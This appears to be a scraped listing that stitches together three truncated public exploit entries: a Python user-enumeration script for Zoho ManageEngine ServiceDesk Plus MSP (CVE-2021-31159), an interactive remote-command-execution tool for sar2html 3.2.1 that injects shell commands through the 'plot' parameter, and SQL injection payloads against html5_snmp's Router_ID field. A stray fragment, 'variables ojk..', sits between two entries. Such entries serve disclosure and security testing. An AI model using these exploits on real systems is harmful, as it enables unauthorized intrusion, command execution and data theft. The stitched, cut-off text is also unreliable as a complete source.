# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration # Date: 17/06/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) # Vendor Homepage: https://www.manageengine.com # Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 # Version: Previous to build 10519 # Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 # Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] # Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 import argparse import requests import urllib3 urllib3 . disable_warnings ( urllib3 . exceptions . InsecureRequestWarning ) def get_args ( ) : parser = argparse . ArgumentParser ( ) parser . add_argument ( '-d' , '--domain' , required = True , action = 'store' , help = 'Domain to attack' ) ...
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Ubuntu 18.04.1 #!/usr/bin/env python3 import requests import re from cmd import Cmd url = input ( "Enter The url => " ) class Terminal ( Cmd ) : prompt = "Command => " def default ( self , args ) : exploiter ( args ) def exploiter ( cmd ) : global url sess = requests . session ( ) output = sess . get ( f "{url}/index.php?plot=;{cmd}" ) try : out = re . findall ( "<option value=(.*?)>" , output . text ) except : print ( "Error!!" ) for ouut in out : if "There is no defined host..." not in ouut : if "null selected" not i...
variables ojk..
# Exploit Title: html5_snmp 1.11 - 'Router_ID' SQL Injection # Date: 2019-11-01 # Exploit Author: Cakes # Vendor Homepage: https://github.com/lolypop55/html5_snmp # Software Link: https://github.com/lolypop55/html5_snmp.git # Version: 1.11 # Tested on: CentOS 7 # CVE: N/A # PoC for error, time, boolean and Union based SQL Injection # Parameter: Router_ID (POST) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Payload: Router_ID=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aJYp'='aJYp&Router_Name=123&Router_IP=123&String=123&Remark=123&Submit=...